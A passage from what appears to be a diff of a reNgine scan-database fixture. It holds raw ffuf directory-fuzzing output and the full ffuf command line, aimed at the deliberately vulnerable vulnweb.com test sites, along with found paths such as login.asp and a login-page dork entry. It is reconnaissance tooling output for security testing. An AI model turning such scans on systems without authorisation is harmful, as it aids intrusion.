[1/1] :: 107 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [2579/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [2596/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [2602/4842] :: Job [1/1] :: 105 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [2620/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [2631/4842] :: Job [1/1] :: 103 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [2648/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:27] :: Errors: 0 ::\n\u001b[2K:: Progress: [2660/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [2680/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [2688/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [2704/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [2710/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [2727/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [2739/4842] :: Job [1/1] :: 106 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [2744/4842] :: Job [1/1] :: 100 req/sec :: Duration: [0:00:28] :: Errors: 0 ::\n\u001b[2K:: Progress: [2760/4842] :: Job [1/1] :: 103 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [2766/4842] :: Job [1/1] :: 98 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [2789/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [2796/4842] :: Job [1/1] :: 99 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [2806/4842] :: Job [1/1] :: 97 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [2816/4842] :: Job [1/1] :: 94 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [2825/4842] :: Job [1/1] :: 90 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [2835/4842] :: Job [1/1] :: 89 req/sec :: Duration: [0:00:29] :: Errors: 0 ::\n\u001b[2K:: Progress: [2846/4842] :: Job [1/1] :: 90 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [2860/4842] :: Job [1/1] :: 92 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [2868/4842] :: Job [1/1] :: 89 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [2886/4842] :: Job [1/1] :: 90 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [2899/4842] :: Job [1/1] :: 94 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [2910/4842] :: Job [1/1] :: 96 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"NjE4NDliNTg=\",\"FUZZ\":\"bG9naW4uYXNw\"},\"position\":2904,\"status\":200,\"length\":3194,\"words\":429,\"lines\":55,\"content-type\":\"text/html\",\"redirectlocation\":\"\",\"url\":\"http://testasp.vulnweb.com/login.asp\",\"duration\":181644866,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testasp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [2923/4842] :: Job [1/1] :: 95 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [2926/4842] :: Job [1/1] :: 99 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [2933/4842] :: Job [1/1] :: 93 req/sec :: Duration: [0:00:30] :: Errors: 0 ::\n\u001b[2K:: Progress: [2951/4842] :: Job [1/1] :: 100 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [2967/4842] :: Job [1/1] :: 105 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [2976/4842] :: Job [1/1] :: 102 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [2994/4842] :: Job [1/1] :: 106 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3006/4842] :: Job [1/1] :: 106 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3023/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3034/4842] :: Job [1/1] :: 108 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3052/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:31] :: Errors: 0 ::\n\u001b[2K:: Progress: [3065/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3081/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3092/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3109/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3117/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3135/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3146/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3163/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:32] :: Errors: 0 ::\n\u001b[2K:: Progress: [3171/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3187/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3199/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3217/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3226/4842] :: Job [1/1] :: 106 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3250/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3255/4842] :: Job [1/1] :: 103 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3274/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:33] :: Errors: 0 ::\n\u001b[2K:: Progress: [3283/4842] :: Job [1/1] :: 108 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3298/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3316/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3327/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3346/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3359/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3371/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3382/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:34] :: Errors: 0 ::\n\u001b[2K:: Progress: [3401/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [3408/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [3424/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [3439/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [3459/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [3468/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [3490/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [3497/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:35] :: Errors: 0 ::\n\u001b[2K:: Progress: [3518/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [3528/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [3534/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [3548/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [3560/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [3577/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [3587/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [3605/4842] :: Job [1/1] :: 108 req/sec :: Duration: [0:00:36] :: Errors: 0 ::\n\u001b[2K:: Progress: [3615/4842] :: Job [1/1] :: 108 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [3632/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [3644/4842] :: Job [1/1] :: 108 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [3662/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [3673/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [3693/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [3717/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [3724/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:37] :: Errors: 0 ::\n\u001b[2K:: Progress: [3747/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [3757/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [3769/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [3786/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [3793/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [3803/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [3812/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [3829/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:38] :: Errors: 0 ::\n\u001b[2K:: Progress: [3840/4842] :: Job [1/1] :: 108 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [3855/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [3870/4842] :: Job [1/1] :: 106 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"NjE4NDlmMTQ=\",\"FUZZ\":\"cm9ib3RzLnR4dA==\"},\"position\":3860,\"status\":200,\"length\":13,\"words\":2,\"lines\":1,\"content-type\":\"text/plain\",\"redirectlocation\":\"\",\"url\":\"http://testasp.vulnweb.com/robots.txt\",\"duration\":180925045,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testasp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [3879/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [3879/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [3893/4842] :: Job [1/1] :: 100 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [3902/4842] :: Job [1/1] :: 102 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [3926/4842] :: Job [1/1] :: 102 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [3930/4842] :: Job [1/1] :: 97 req/sec :: Duration: [0:00:39] :: Errors: 0 ::\n\u001b[2K:: Progress: [3956/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [3961/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [3986/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [3996/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4014/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4024/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4041/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4052/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:40] :: Errors: 0 ::\n\u001b[2K:: Progress: [4069/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4084/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4098/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4113/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4123/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4136/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4149/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4163/4842] :: Job [1/1] :: 108 req/sec :: Duration: [0:00:41] :: Errors: 0 ::\n\u001b[2K:: Progress: [4175/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:42] :: Errors: 0 ::\n\u001b[2K:: Progress: [4196/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:42] :: Errors: 0 ::\n\u001b[2K:: Progress: [4210/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:42] :: Errors: 0 ::\n\u001b[2K:: Progress: [4220/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:42] :: Errors: 0 ::\n\u001b[2K:: Progress: [4238/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:42] :: Errors: 0 ::\n\u001b[2K:: Progress: [4249/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:42] :: Errors: 0 ::\n\u001b[2K:: Progress: [4264/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:42] :: Errors: 0 ::\n\u001b[2K:: Progress: [4275/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:42] :: Errors: 0 ::\n\u001b[2K:: Progress: [4294/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:43] :: Errors: 0 ::\n\u001b[2K:: Progress: [4303/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:43] :: Errors: 0 ::\n\u001b[2K:: Progress: [4321/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:43] :: Errors: 0 ::\n\u001b[2K:: Progress: [4334/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:43] :: Errors: 0 ::\n\u001b[2K:: Progress: [4353/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:43] :: Errors: 0 ::\n\u001b[2K:: Progress: [4362/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:43] :: Errors: 0 ::\n\u001b[2K:: Progress: [4380/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:43] :: Errors: 0 ::\n\u001b[2K:: Progress: [4388/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:43] :: Errors: 0 ::\n\u001b[2K:: Progress: [4409/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:44] :: Errors: 0 ::\n\u001b[2K:: Progress: [4422/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:44] :: Errors: 0 ::\n\u001b[2K:: Progress: [4437/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:44] :: Errors: 0 ::\n\u001b[2K:: Progress: [4446/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:44] :: Errors: 0 ::\n\u001b[2K:: Progress: [4459/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:44] :: Errors: 0 ::\n\u001b[2K:: Progress: [4472/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:44] :: Errors: 0 ::\n\u001b[2K:: Progress: [4484/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:44] :: Errors: 0 ::\n\u001b[2K:: Progress: [4502/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:44] :: Errors: 0 ::\n\u001b[2K:: Progress: [4513/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:45] :: Errors: 0 ::\n\u001b[2K:: Progress: [4533/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:45] :: Errors: 0 ::\n\u001b[2K:: Progress: [4541/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:45] :: Errors: 0 ::\n\u001b[2K:: Progress: [4562/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:45] :: Errors: 0 ::\n\u001b[2K:: Progress: [4570/4842] :: Job [1/1] :: 108 req/sec :: Duration: [0:00:45] :: Errors: 0 ::\n\u001b[2K:: Progress: [4582/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:45] :: Errors: 0 ::\n\u001b[2K:: Progress: [4598/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:45] :: Errors: 0 ::\n\u001b[2K:: Progress: [4606/4842] :: Job [1/1] :: 108 req/sec :: Duration: [0:00:45] :: Errors: 0 ::\n\u001b[2K:: Progress: [4621/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:46] :: Errors: 0 ::\n\u001b[2K:: Progress: [4634/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:46] :: Errors: 0 ::\n\u001b[2K:: Progress: [4649/4842] :: Job [1/1] :: 108 req/sec :: Duration: [0:00:46] :: Errors: 0 ::\n\u001b[2K:: Progress: [4660/4842] :: Job [1/1] :: 106 req/sec :: Duration: [0:00:46] :: Errors: 0 ::\n\u001b[2K:: Progress: [4678/4842] :: Job [1/1] :: 104 req/sec :: Duration: [0:00:46] :: Errors: 0 ::\n\u001b[2K:: Progress: [4685/4842] :: Job [1/1] :: 102 req/sec :: Duration: [0:00:46] :: Errors: 0 ::\n\u001b[2K:: Progress: [4703/4842] :: Job [1/1] :: 102 req/sec :: Duration: [0:00:46] :: Errors: 0 ::\n\u001b[2K:: Progress: [4709/4842] :: Job [1/1] :: 97 req/sec :: Duration: [0:00:46] :: Errors: 0 ::\n\u001b[2K:: Progress: [4729/4842] :: Job [1/1] :: 103 req/sec :: Duration: [0:00:47] :: Errors: 0 ::\n\u001b[2K:: Progress: [4748/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:47] :: Errors: 0 ::\n\u001b[2K:: Progress: [4756/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:47] :: Errors: 0 ::\n\u001b[2K:: Progress: [4772/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:47] :: Errors: 0 ::\n\u001b[2K:: Progress: [4785/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:47] :: Errors: 0 ::\n\u001b[2K:: Progress: [4799/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:47] :: Errors: 0 ::\n\u001b[2K:: Progress: [4811/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:47] :: Errors: 0 ::\n\u001b[2K:: Progress: [4823/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:47] :: Errors: 0 ::\n\u001b[2K:: Progress: [4831/4842] :: Job [1/1] :: 108 req/sec :: Duration: [0:00:48] :: Errors: 0 ::\n\u001b[2K:: Progress: [4842/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:48] :: Errors: 0 ::\n\u001b[2K:: Progress: [4842/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:48] :: Errors: 0 ::\n", + "time": "2024-11-13T02:36:18.350Z" } }, { - "model": "startScan.dork", - "pk": 10, + "model": "startScan.command", + "pk": 109, "fields": { - "type": "login_pages", - "url": "http://testphp.vulnweb.com/artists.php?artist=1" + "scan_history": 1, + "activity": 6, + "command": "ffuf -w /home/rengine/wordlists/fuzz-Bo0oM.txt -p 0.05 -t 30 -timeout 5 -ac -mc 200,204 -u http://testaspnet.vulnweb.com/FUZZ -json", + "return_code": 0, + "output": "\n /'___\\ /'___\\ /'___\\ \n /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \n \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \n \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \n \\/_/ \\/_/ \\/___/ \\/_/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http://testaspnet.vulnweb.com/FUZZ\n :: Wordlist : FUZZ: /home/rengine/wordlists/fuzz-Bo0oM.txt\n :: Follow redirects : false\n :: Calibration : true\n :: Timeout : 5\n :: Threads : 30\n :: Delay : 0.05 seconds\n :: Matcher : Response status: 200,204\n________________________________________________\n\n\n\u001b[2K:: Progress: [1/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [60/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [60/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [89/4842] :: Job [1/1] :: 259 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [90/4842] :: Job [1/1] :: 147 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [92/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [93/4842] :: Job [1/1] :: 100 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [95/4842] :: Job [1/1] :: 91 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [96/4842] :: Job [1/1] :: 77 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [125/4842] :: Job [1/1] :: 95 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [128/4842] :: Job [1/1] :: 83 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [154/4842] :: Job [1/1] :: 98 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [159/4842] :: Job [1/1] :: 89 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [183/4842] :: Job [1/1] :: 102 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [212/4842] :: Job [1/1] :: 102 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [214/4842] :: Job [1/1] :: 94 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [228/4842] :: Job [1/1] :: 87 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [234/4842] :: Job [1/1] :: 82 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [252/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [254/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [282/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [282/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [310/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [322/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [338/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [354/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [363/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [377/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [386/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [405/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [409/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [428/4842] :: Job [1/1] :: 106 req/sec :: 